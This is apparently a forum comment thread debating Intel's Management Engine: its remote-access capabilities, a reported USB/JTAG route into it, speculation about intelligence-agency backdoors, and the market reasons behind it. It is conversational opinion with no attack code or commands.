On the other hand, if your person is interesting enough to NSA to deploy such an exploit against your devices, probably you have vastly more significant problems, like trying to stay outside the visual range of a Predator drone. If any Three Letter Agency will deploy such an exploit against your PC, you can be absolutely sure that they have already bugged your phones, and not with a Stinger device, but tapping directly into the data feed at the phone exchange. Probably you have to incinerate your trash because the garbage men are spooks - this is the kind of threat that I assume you're facing if a TLA is trying to bug your ME.
We must've read very different novels. In Chapter 5 (when he finally recounts how he brought the golem to life, after talking about his life and his studies up to that point) it's clear that he instantly regretted it.
> I had worked hard for nearly two years, for the sole purpose of infusing life into an inanimate body. For this I had deprived myself of rest and health. I had desired it with an ardour that far exceeded moderation; but now that I had finished, the beauty of the dream vanished, and breathless horror and disgust filled my heart.
And he didn't take it home with him. He leaves his laboratory and heads back home. The golem lives in the forest for a long time, and finds a family living in a cottage. While hiding from them, he learns to speak, and tries to talk to them. They shun him, and he is filled with anger at his creator for creating him and leaving him alone. So he finds Frankenstein's home and then kills his family.
Maybe some adaptions of the book have different stories on this topic (I've only ever read the original) but I would argue that a depiction which shows Frankenstein regret his decision much later (and the golem's murder of his family being something other than revenge against his creator for abandoning him) is missing the point of Shelly's story.
But looking at the International Obfuscated C Code Contest (http://www.ioccc.org/) entries, and knowing how much I have to force my eyes not to glaze over whenever a college sends me a 700 line pull-request, if one of your colleagues waited until the deadline to send a massive pull-request for their part of the project, can you say that the deadline is pushed back until every single line is meticulously analyzed by hand, to assert that nothing nefarious could possibly happen with their code?
Just one of your coworkers would need to believe in a greater purpose, for king and country, and grown up in a large family with a brother or cousin who's a part of the intelligence community.
It sounds far-fetched, but so does the Bay of Pigs.
That's not how the intelligence agencies operate.
> evolved from there over months/years
THIS is how they influence standards and design choices. We know that in 2013 the NSA budgeted at least $250M to programs such as "BULLRUN" that which intended to "Insert vulnerabilities into commercial encryption networks, IT systems, and endpoint communication devices...".
For an example of how this works, see John Gilmore's description of how the NSA influenced IPSEC. They don't use a folder of requirements; instead they gain influence over enough people to complain about "efficiency" or other distractions and occasionally add a confusing or complicated requirement that just happens to weaken security.
PHK gave an outstanding talk that everyone should see about the broader subject of how the common model most people have about how the NSA works is obsolete.
That's a thing actually.
> I'll never be able to convince anyone of anything.
I believe you. Conspiracy theories are fun but ultimately I know that secrets are hard to keep secret.
Also which internal or external groups lead the code development of those processes?
Is the code accessible to any employee/engineer with a technical relationship to IME?
Then why do you need security clearance to work on Intel ME?
I'm fairly certain similar restrictions will also apply to those who are granted access to knowledge about CPU microcode, which is an equally large security risk that nobody with even a basic understanding of how CPUs work is blaming on the CIA.
Incidentally, did you hear about Silent Bob is Silent? What are your thoughts on that vuln?
If that is the case, we would have doubted about this too much early than it would otherwise (because there is a dedicated hardware).
So some people friendly feature have to be dubbed along with the anti-features. This may not be the real case though, but one of the possibilities.
Is a JVM really a lot more stuff than Minix OS?
- The masses actually care
- There is an alternative
Neither is the case here. Most people couldn't care less about things like ME and AMD and Intel are a oligopoly. If you want a modern x86-64 CPU you only have those two choices and both do this. That is the problem here, not fiat currency.
Examples of this might be Fair Trade coffee, or energy saving light bulbs. Prior to their marketing, I doubt that vague ethical considerations were on the 'top 10' list of consumer wants from a new product, if they registered at all.
But when people are presented with a choice, if you can, why not get the better stuff?
Another analogy might be something like the TPM chips on iPhones. I very much doubt that focus groups or surveys at Apple found TPMs in the list of requested new features. However, things like TPMs get written up, and add to the things that journalists can describe around the vague theme of relative security and relative privacy; important concepts to consumers. Once this is internalized, when making a comparison between phones, a motivated consumer might consider the absence of a TPM a problem.
I doubt that Intel would start marketing _No Backdoor™_ chips, but I could imagine a consumer-facing hardware vendor coming up with some kind of comparison-based branding for avoiding the ME. There's a reasonable chance that Apple may continue to integrate vertically and get away from Intel over the next few years. And I was extremely surprised that Purism (a company basically founded on resentment towards the ME) could crowd-fund millions of dollars in the way it has.
Perhaps another technique to punish them is via class action lawsuit - with all the companies potentially affected by this and what now seems like evidence of intent forthcoming it maybe is solid basis for a case but I'm no lawyer.
At the same time as "buy American"? You're aware that any American chipmaker will be gag-ordered to help the CIA?
Perhaps this is pie in the sky but a future where open hardware is as ubiquitous/accessible/easy to use as open source software would make it easier to change chips or gut your laptop and re-build it with hardware that you can trust.
While the ME is worrying for many reasons, there's absolutely zero evidence that the Intel ME contains a backdoor.
Backdoors don't stay hidden forever.
Secondly, a security hole and a backdoor are interchangeable these days. So we'll never be able to prove which new 0-days are deliberate, and as far as impact it kinda doesn't matter if they're deliberate.
The ME is a really bad idea because it introduces massive, unnecessary attack surface and vulnerabilities are inevitable, but no conspiracy.
We've seen deliberate security vulnerabilities before (DUAL_EC).
(and yes, it backfired)
If they're introducing regular vulnerabilities, they're also making themselves vulnerable, given that the US government is one of the biggest Intel customers.
AMT is an application that runs on ME, and it's on very many (most? all?) Intel-based desktop/laptops.
A JTAG is a standard minimal serial port used for debugging purposes. You'll find them on nearly all embedded devices - routers, phones, TVs, refrigerator controllers... usually appearing as a set of two or three contact points. Sometimes they connect directly to a debugger.
In this case, it appears that at least some Intel CPUs have a JTAG on the ME that can be routed through the on-CPU USB handler, and thus physical access to the right USB ports can be used to access the ME.
I suspect they fiddled with something to get access, however. Attached something to motherboard or similar.
Intel ME can be controlled remotely if you have an Intel lan card, even if the main cpu is off, but the motherboard is powered on. It goes from there and gets worse is my understanding.
AMD have something similar so no help there.
It's probably worse for AMD. For Intel now at least we'll probably get the ability to securely disable everything below ring -1.
AMD had the chance to differentiate from Intel here, instead they blindly immitate the same customer-hostile stunt.
Intel decided it wanted a piece of that pie, and in an effort to improve margins, and sell more CPUs, Intel thought: "what if we offer the same feature, but use less hardware?" and made it part of their chipset.
As a feature that businesses actually want, and they buy CPUs in the 10,000's/year, compared to maybe 1/year I might buy for personal use. AMD implemented similar in order to keep up and remain competitive in the market.
Intel desktop chipsets aren't wholly different from their server chipsets, and they share some internals. Intel also realized that, since they already paid for development of the technology that it would be useful for administrators of a computer lab to be able to have remote admin access, and made it a requisite part of all systems.
Again, AMD implemented the same to keep up.
It could also be part of an NSA plot (it is part of their mission, after all), but "the market" where individuals don't count as much as corporate buyers, is sufficient to explain the situation.
There are some obvious reasons why it's not completely open, notably that ME enables feature unlocking keys and DRM at a lower cost than more hardware-involved approaches; but I don't think that explains the recent PR attempts and complete dodging of this issue.
Have you worked in large enterprise organizations that sold things to other large enterprise organizations? Did you go read the bit about how banks were pressuring Intel to include full blown JVMs into the ME and they resisted that?
> leaves a lot of crucial ethical and technical questions completely unanswered.
The truth is mundane which is that Intel wanted money from Banks, and a bunch of workers tried to split the difference between giving the Banks everything they wanted and trying not to engineer gaping security holes. They were operating with imperfect information and got that equation wrong.
And the truth is that no company in the world attempts to engineer for perfect security. When security runs up against economic concerns they try to balance the costs and benefits.
Assume that we (you the reader) can know perfectly which possible vulnerabilities are actually exploitable and which are not. If Intel spends any time on possible vulnerabilities which in practice are not exploitable or never exploitable, that is entirely wasted time. If AMD spends no time at all on those, AMD can focus on shipping features and get ahead of Intel doing useful work. Since Intel and AMD cannot have perfect information, they make guesses as to the impact of possible security holes. That naturally will always result in them "cutting corners" from the perspective of someone who measures them only on their security posture. Enterprise corporations like this are a complicated non-linear non-convex optimization algorithm that attempts to balance economic, security and other concerns against a complicated and shifting landscape in the face of imperfect information. Any company that tried to have always perfect security would largely fail in the marketplace.
This is related to the explanation of why the locks on the front door of your house or apartment can likely easily be picked.
Security concerns are sacrificed for economic concerns, commonly, everywhere around you.
And the AMD people now thinking hard how they can leak hints to their kill-switch in an inconspicuous way, too.
But that's indeed imagination. Unforunately, we don't (yet) know much about their motivations.
If you want to compete with Intel or AMD in the CPU market, you are talking tens of billions in NRE before you ever have something that is remotely competitive. And then you have to do it all over when we switch from 14nm to 7nm, and then again when we go from 7nm to 3nm.
If you want more competition, you have to level the playing field by banning most of the op-codes. But even then you still have crazy amounts of pipelining and other optimizations which are nontrivial to figure out and very expensive to implement.
Intel is in a great position.
Is it too costly to build a separate non-remote CPU for non-enterprise? Does it provide some useful functionality for regular consumers?
The answer is probably they do not think there's a market for it, but still makes me wonder.
Loads of us (sysadmins) complained that IPMI (DRAC, LOM...) had frequent security issues, wasn't running open-source code that we could inspect, and kept growing new features without any sense of responsibility. We were especially irked when a dedicated IPMI ethernet port got shared with a micro switch to a normal system ethernet port, and it was not possible to turn that behavior off.
Don't say we didn't complain. Say that we were not successful in having motherboard manufacturers implement the features we want in a secure and controllable manner.
I'm pretty sure that i.MX6 chips are relatively clean. Modern chips are becoming less so.
So they can mess with ME (dump its code, analyze it, observe how it runs, modify it live) as they see fit.
"Towards (reasonably) trustworthy x86 laptops"
Also, the paper by the author is worth a read:
"State considered harmful - A proposal for a stateless laptop"
Imagine that you have your high level program. When you execute it, it goes through a just-in-time compilation (whether that's script parsing or bytecode conversion, or actual compilation, or whatever) before reaching the CPU which actually executes your code. Now imagine that your interpreter has the capability of reading and monitoring everything you do.
Nothing wrong with that, it's supposed to do that, it's how it works. But imagine if it had an exposed, unlogged, unmonitored, API which allowed a third party to be able to interact with whatever you do. Say that it's there "for debugging purposes".
You want to encrypt an HTTPS session? This API allows them to grab your key without ever notifying you. Or, even if you use custom encryption, it allows them to grab your specific instructions and the data used in processing to reverse your encryption.
It allows a remote party to inject their own flow of execution into your program. So you're sitting there waiting for the next user event to occur in your event loop while, instead, the interpreter simply handed the whole event loop to a third party. They could inject user events for you to process that the user never actually performed; they could modify data in ways that you can never detect.
Except that it's not the interpreter. It's a side-channel, an additional hidden core on your CPU (it's actually a completely hidden and separate secondary CPU). Your processor still runs and executes your code. But another processor is simultaneously running and executing its own code with its own RAM that you can't access. It has access to your RAM as if it were a file open on your hard disk.
You can't disable it. You can't interact with it. It's even running when your computer is "shut off". If there's power on the motherboard, then this hidden processor is running.
That, in a nutshell, is Intel ME...
... This sounds _really_ paranoid and alarmist. But it's not all bad. Intel has usually done really well with "security through obscurity" in this case and there aren't many known exploits for Intel ME. That said, those that do or could exist, gain all of the capabilities of Intel ME.
Most people consider "game over" for physical access anyway, so I'm not sure that pwning it with physical access is a new problem; instead it's a secret basement in a bank; it's only a problem if someone figures out it's there and starts digging a tunnel to it.
Also, remember that a lot of motherboards these days come with built-in wifi or bluetooth adaptors. Intel ME has access to those too; you can't just rely on an upstream firewall for your physical ethernet. With the right (wrong?) exploit, all it takes is an adversary to be within directional antenna distance (which is actually really far) to be able to pwn your system. The best way to prevent abuse over that channel is to physically break the antenna connection (lol warranty voided because you've damaged your motherboard).
Thanks for your helpful explanation. This bit sounds particularly bad - is the really possible in practice or just theoretical? Is there any source that has shown this?
* it's definitely possible for Intel (and anyone Intel gives access to)
* it's theoretically possible for anyone with a zero-day hack (or now physical access)
I completely agree that in retrospect, it wasn't the best idea. However, I really want to say that it was never a project for the CIA as some keep saying.
This was a widely-marketed product at the time of its inception. It was the whole point of the Intel vPro line. I've been to a ton of roadshows between 2008 and 2009 where the marketing people demoed the heck out of ME to everybody. It was a feature thought to be THE differentiator from AMD. Of course, later AMD came up with their own equivalent and ME became "a commodity"
So again, we can all argue whether it was a bad idea, but the notion that it was designed by/with the CIA is simply not true to the best of my knowledge, but I really think I'd know, as I've been to way too many design meetings and saw the decisions being made by Intel engineers.
However, one thing that I've always felt conflicted about is why this feature is present in _all_ CPUs. Usually if someone wants to use Intel's AMT then they have a giant support contract with specialty hardware, so it seems odd that the core CPU feature necessary is present on all CPUs despite no user actually using outside of enterprise.
Is it because the bring-up, other low-level stuff, and things like PASP (DRM) were implemented on top of ME, and so it was not considered viable to re-do that on chips that didn't have ME (though I was under the impression that very early ME was not used for anything else)? Or was it just a matter of "it's easier to just use what we have for every chip"?
1. Many features have options to be disabled (e.g. bios settings). Why doesn't this, even to this day?
2. You may have been involved in implementation, but do you know why it still exists on every board regardless of backlash?
3. I am a bit ignorant, does the chip fabbing process justify putting this on every board instead of just on enterprise ones (especially since you can consider it a feature worth upcharging for)?
Pardon my skepticism, but its continued use without the ability to disable speaks to ulterior motives regardless of original implementation design.
Seems irrelevant. The internet and smartphones were also not created by the CIA/NSA for mass surveillance, yet the 3 letter guys still uses those technologies for mass surveillance very successfully.
Probably not a rubber stamp with "CIA" on top of the project documentation, but someone on the team could have been talking to the intelligence community and relaying specs or meeting details.
It's an obvious target just because of Intel's ubiquity and they are based in the US. You're kind of a bad intelligence agency if you don't try for backdoors to this level on processors running millions of devices world-wide. And the intelligence community has actively tried to stop good encryption from spreading while promoting bad encryption/RNG (forgive me for not knowing the details), and so it's pretty clear they are willing to compromise worldwide standards in favor of gaining an edge.
But given the already well-known threat model at the time this thing was conceived of self-propagating malware, creating a technology that is embedded in every single device with a desktop CPU that can't be turned off, makes the device unusable without it, and has remote compromise bugs that can succeed while the target is "off" was certainly a bad idea.
If you choose to defect and leak all the information you can, you will almost certainly be greatly praised for it by many. Of course there will be negative consequences, but no one ever said that standing firm and adhering to your morals was easy. Maybe if enough employees stood up for what they think is right instead of continuing to silently comply like slaves and let --- or even assist --- companies and governments slowly take away their freedom and privacy, there would be some actual change happening.
TIL about this detail. Where can I learn more?
EDIT: So this is now at 0 points. Interesting...
This one has a bit more info (although not much as far as details go): https://news.ycombinator.com/item?id=15668363
Maybe this discovery will help us understand more how the verification step works. But I think the best we can hope for is a way of overwriting Intel ME very quickly after it's booted every time.
Anyway, how do I know whether my CPU has it and is vulnerable via USB?
Anybody can shed light on this tool and whether it can mitigate the attack mentioned in the tweet?
Greatest news is that it works for latest Intel processors so even if they change protection (they certainly will) we at least have very good processors that can work without spyware. All the previous tests I read about only tackled first few generations of Intel ME, for processors/boards over 8 or 10 years old.
The articles referenced in Tanenbaum's blog post don't really reveal the source of the Minix discovery, other than it was due to some recent discovery.
Next, download Minix and get a good handle on it. The next step is getting access to the Minix kernel on the ME, and after that, it'll be a case of who has the best apps for the CPU in their CPU.
There was no call nor need for an answer...
I think this was Minix's first real-world use case (read: ego validation), and Andrew Tanenbaum was just unimpressed he learned about it by proxy.